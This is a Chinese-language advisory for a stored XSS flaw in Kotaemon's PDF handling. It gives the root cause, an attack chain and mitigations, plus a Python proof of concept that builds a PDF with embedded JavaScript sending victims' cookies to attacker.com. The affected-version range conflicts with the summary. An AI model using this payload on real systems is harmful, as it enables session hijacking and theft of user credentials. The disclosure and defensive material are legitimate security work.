CVE-2025-56526 Kotaemon PDF存储型跨站脚本(XSS)漏洞

漏洞信息

漏洞编号

CVE-2025-56526

漏洞类型

XSS（跨站脚本攻击）

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Kotaemon

漏洞概述

CVE-2025-56526是发现于Kotaemon 0.11.0版本中的一个存储型跨站脚本(XSS)漏洞。该漏洞允许攻击者通过精心构造的恶意PDF文件在应用内注入并执行任意JavaScript代码。Kotaemon是一个开源的文档问答系统，用户可以上传PDF文档进行内容分析和交互。当应用处理并渲染包含恶意脚本的PDF内容时，未对PDF中的JavaScript代码进行充分的过滤和转义处理，导致攻击者可以在受害者的浏览器会话中执行任意代码。此漏洞的CVSS评分为6.1，属于中等严重程度，攻击复杂度低，但需要用户交互（上传或查看恶意PDF文件）。由于该漏洞可通过社会工程学手段诱导用户上传恶意PDF，因此在实际攻击场景中具有较高的可行性。攻击成功后，攻击者可以窃取用户的会话Cookie、劫持用户账户、读取敏感数据或进行进一步的攻击。

技术细节

该漏洞的根本原因在于Kotaemon应用在处理PDF文件内容时缺乏充分的输入验证和输出编码。攻击者可以在PDF文件的元数据、注释或文本内容中嵌入JavaScript代码，当应用使用PDF.js等库解析并渲染PDF时，这些恶意脚本会被执行。具体技术细节包括：1) PDF规范支持在文档中嵌入JavaScript代码，可通过PDF对象的AA(Additional Actions)或OpenAction触发；2) Kotaemon的PDF渲染组件直接使用iframe或内联方式加载PDF内容，未启用沙箱隔离；3) 应用未对PDF内容进行安全过滤，未移除或禁用JavaScript代码；4) 攻击者利用PDF的JavaScript功能在文档打开时自动执行恶意代码；5) 漏洞属于存储型XSS，恶意代码随PDF文件持久化在系统中，影响所有查看该PDF的用户。修复方案应包括：对PDF内容进行深度清理，移除所有JavaScript代码和可执行内容；启用PDF.js的沙箱模式阻止脚本执行；对用户上传的PDF进行安全扫描；实施严格的Content Security Policy(CSP)策略。

攻击链分析

STEP 1

步骤1: 侦察与准备

攻击者识别目标使用的Kotaemon版本，确认版本为0.11.0或更早版本。攻击者创建包含恶意JavaScript代码的PDF文件，利用PDF规范的JavaScript功能注入payload。

STEP 2

步骤2: 投递恶意PDF

攻击者通过社会工程学手段诱骗目标用户上传恶意PDF文件。常见方式包括：伪装成合法文档、嵌入在压缩包中、或通过文件共享平台传播。

STEP 3

步骤3: 触发漏洞

当目标用户在Kotaemon应用中打开或预览该PDF文件时，PDF渲染组件（如PDF.js）会解析并执行PDF中嵌入的JavaScript代码，无需用户额外交互。

STEP 4

步骤4: 恶意代码执行

恶意JavaScript在受害者的浏览器上下文中执行。攻击者可利用此机会窃取用户的会话Cookie、劫持账户、读取LocalStorage中的敏感信息（包括存储的凭证），或执行进一步的攻击。

STEP 5

步骤5: 持久化与横向移动

由于是存储型XSS，所有查看该PDF的用户都会触发漏洞。攻击者可以窃取多个用户的凭证，进行横向移动，获取更多敏感数据或控制更多账户。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

'''
CVE-2025-56526 PoC - Kotaemon PDF XSS Vulnerability
This PoC demonstrates how to create a malicious PDF with embedded JavaScript
that will execute when opened in Kotaemon application.
'''

from pypdf import PdfWriter, PdfReader
from pypdf.generic import DictionaryObject, ArrayObject, NameObject, NumberObject, TextStringObject

def create_malicious_pdf(output_path):
    """
    Create a malicious PDF with embedded JavaScript for XSS attack
    """
    # Create a new PDF
    writer = PdfWriter()
    
    # Add a simple page
    from pypdf import PageObject
    page = PageObject.create_blank_page(width=612, height=792)
    writer.add_page(page)
    
    # Add JavaScript action to the PDF
    # This JavaScript will execute when the PDF is opened
    malicious_js = """
    app.alert('XSS Payload Executed!\\nStealing cookies: ' + document.cookie);
    // Attempt to steal sensitive data
    try {
        var img = document.createElement('img');
        img.src = 'http://attacker.com/steal?c=' + encodeURIComponent(document.cookie);
        document.body.appendChild(img);
    } catch(e) {}
    """
    
    # Add the JavaScript action
    # Using catalog dictionary to add OpenAction
    writer.add_js(malicious_js)
    
    # Write the malicious PDF
    with open(output_path, 'wb') as f:
        writer.write(f)
    
    print(f"Malicious PDF created: {output_path}")
    print("Upload this PDF to Kotaemon to trigger the XSS vulnerability")

# Alternative: Create PDF with JavaScript in document-level scripts
def create_malicious_pdf_alt(output_path):
    """
    Alternative method using document actions
    """
    from pypdf import PdfWriter
    from pypdf.generic import DictionaryObject, ArrayObject, NameObject
    
    writer = PdfWriter()
    
    # Create page
    from pypdf import PageObject
    page = PageObject.create_blank_page(width=612, height=792)
    writer.add_page(page)
    
    # Add JavaScript via catalog OpenAction
    js_action = DictionaryObject()
    js_action[NameObject('/S')] = NameObject('/JavaScript')
    js_action[NameObject('/JS')] = TextStringObject(
        'app.alert("CVE-2025-56526 XSS - Cookie Theft: " + document.cookie);'
    )
    
    # Set OpenAction in catalog
    writer._root_object[NameObject('/OpenAction')] = js_action
    
    with open(output_path, 'wb') as f:
        writer.write(f)

if __name__ == '__main__':
    create_malicious_pdf('malicious_cve_2025_56526.pdf')
    print("\nPoC instructions:")
    print("1. Generate the malicious PDF using this script")
    print("2. Upload the PDF to Kotaemon application")
    print("3. When users view the PDF, the JavaScript will execute")
    print("4. Attacker's server will receive stolen session cookies")

影响范围

Kotaemon < 0.11.0

防御指南

临时缓解措施

在官方修复版本发布之前，可采取以下临时缓解措施：1) 限制PDF文件上传功能，仅允许受信任的用户上传文档；2) 对上传的PDF文件进行预处理，移除所有JavaScript代码和注释；3) 使用PDF转换工具将PDF转换为图像格式，消除可执行内容；4) 在前端实施严格的输入验证和输出编码；5) 监控和审计PDF文件上传行为；6) 考虑暂时禁用PDF预览功能，使用外部安全查看器替代；7) 加强用户安全意识培训，警惕来源不明的PDF文件。